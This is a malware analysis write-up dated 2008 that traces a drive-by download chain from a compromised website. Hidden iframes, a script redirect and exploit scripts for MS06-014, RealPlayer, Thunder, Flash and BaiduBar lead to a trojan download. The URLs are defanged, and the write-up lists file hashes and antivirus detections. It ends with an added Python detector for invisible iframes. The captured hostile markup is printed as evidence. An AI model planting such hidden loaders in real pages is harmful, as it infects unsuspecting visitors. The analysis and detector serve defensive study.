A website hosting Trojan-Downloader.SWF.Small uses a Flash vulnerability to spread Trojan-Downloader.Win32.Small

Original by endurer
2008-06-02, 1st version

This website contains the code:
/---
<IFRAME src = hxxp: // www. m ** M * E * x * E **. com/alexa.html width = 0 Height = 0> </iframe>
---/

#1 hxxp: // www. m ** M * E * x * E **. com/alexa.html:
/---
<Script language = "JavaScript" type = "text/JavaScript">
window.location = "hxxp: // www. U ** I ** U ** ou.net/6.htm";
</SCRIPT>
---/

#1.1 hxxp: // www. U ** I ** U ** ou.net/6.htm contains the code:
/---
<IFRAME src = news.html width = 100 Height = 0> </iframe>
---/

#1.1.1 hxxp: // www. U ** I ** U ** ou.net/news.html

During decryption, Kaspersky detected the trojan program Trojan-Downloader.JS.Agent.byj

Output code:
/---
<SCRIPT src = hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/ms06014.js> </SCRIPT>
<Embed src = hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/versionff.swf width = 0 Height = 0>
<IFRAME Style = display: None src = "hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. net/glworld.html "> </iframe>
<Script language = "JavaScript" src = hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. net/real. JS> </SCRIPT>
<IFRAME Style = display: None src = "hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. net/real.html "> </iframe>
<IFRAME width = 100 Height = 0 src = hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. net/thunder.html> </iframe>
---/

#1.1.1.1 hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/ms06014.js (Kaspersky has detected the trojan program Trojan-Downloader.JS.Small.lw)

Uses the MS06-014 vulnerability to download hxxp: // user1 ***. 1 *** 2 ***-*** 23.net/bak.css

File Description: D:/test/bak.css
Attribute: ---
M$ signature: No
PE file: Yes
An error occurred while obtaining the file version information!
Created at: 12:13:57
Modification time: 12:13:57
Size: 13840 bytes, 13.528 KB
MD5: 7806c316c9643b85d9a7229be7273de0
SHA1: a37f4233ad1ebc1548c65b041491a7004454d413
CRC32: 2ae34afc

Kaspersky reports it as Trojan-Downloader.Win32.Small.iyq; Rising reports it as Trojan.DL.win32.mnless.Agu

#1.1.1.2 hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/glworld.html

Downloads hxxp: // user1 **. 1 ** 2 **-** 23.net/bak.css

#1.1.1.3 hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/real. js

Uses the RealPlayer (IERPCtl.IERPCtl.1, CLSID: CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA) vulnerability to download hxxp: // user1 ***. 1 ***-*** 23.net/bak.css

#1.1.1.4 hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/real.html

Uses the RealPlayer (IERPCtl.IERPCtl.1, CLSID: CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA) vulnerability to download hxxp: // user1 ***. 1 ***-*** 23.net/bak.css

#1.1.1.5 hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/thunder.html
Uses Thunder (DPClient.Vod, CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F) to download hxxp: // user1 **. 1 ** 2 **-*** 23.net/bak.css

#1.1.1.6 hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/versionie.swf
Uses the Flash (ShockwaveFlash.ShockwaveFlash.9) vulnerability to download hxxp: // user1 **. 1 ** 2 **-** 23.net/bak.css

File Description: D:/test/versionie.swf
Attribute: ---
M$ signature: No
PE file: No
An error occurred while obtaining the file version information!
Created at: 12:13:56
Modification time: 12:35:34
Size: 133 bytes
MD5: e1bc4891359a7a8b4aabc83759417be
SHA1: 4a177911641401a58c22d00545a67b91ebb79e66
CRC32: 9e640000f

Kaspersky Report: Trojan-Downloader.SWF.Small.bb

#1.1.1.7 Uses BaiduBar.Tool to download hxxp: // * fuck **. g ** o-* 3 ** 6*0 *. Net/Baidu. Cab, which contains baidu.exe
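
Every stage of the chain above is pulled in through an element the visitor cannot see: an IFRAME or Embed with zero width or height, or an IFRAME styled display:none. The following Python check is an added example, not part of the original analysis; it flags such elements in a page, and the sample HTML is constructed with placeholder example.invalid hosts.

```python
import re
from html.parser import HTMLParser

LOADER_TAGS = {"iframe", "embed", "object"}  # elements that pull in remote content

def _is_zero(value):
    """True for size values such as 0, "0" or "0px"."""
    return value is not None and re.fullmatch(r"\s*0+(px|%)?\s*", value, re.I) is not None

def _hidden_by_style(style):
    """True if an inline style sets display:none or visibility:hidden."""
    s = re.sub(r"\s+", "", (style or "").lower())
    return "display:none" in s or "visibility:hidden" in s

class HiddenLoaderFinder(HTMLParser):
    """Collects (tag, src, reason) for invisible iframe/embed/object elements."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in LOADER_TAGS:
            return
        a = dict(attrs)  # HTMLParser already lower-cases tag and attribute names
        reasons = []
        if _is_zero(a.get("width")) or _is_zero(a.get("height")):
            reasons.append("zero-size")
        if _hidden_by_style(a.get("style")):
            reasons.append("style-hidden")
        if reasons:
            self.findings.append((tag, a.get("src") or a.get("data"), "+".join(reasons)))

def find_hidden_loaders(html):
    """Return every hidden loader element found in an HTML string."""
    finder = HiddenLoaderFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample modelled on the markup patterns above; hosts are placeholders.
SAMPLE = """
<p>Welcome</p>
<IFRAME src=http://a.example.invalid/alexa.html width=0 Height=0></IFRAME>
<IFRAME src=news.html width=100 Height=0></IFRAME>
<Embed src=http://b.example.invalid/x.swf width=0 Height=0>
<IFRAME Style="display: None" src="http://b.example.invalid/real.html"></IFRAME>
<iframe src="http://c.example.invalid/video.html" width="640" height="360"></iframe>
"""

if __name__ == "__main__":
    for tag, src, why in find_hidden_loaders(SAMPLE):
        print(f"{tag:7} {why:13} {src}")
```

A hit is a lead for manual review rather than a verdict, since legitimate tracking and analytics frames are often hidden the same way.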
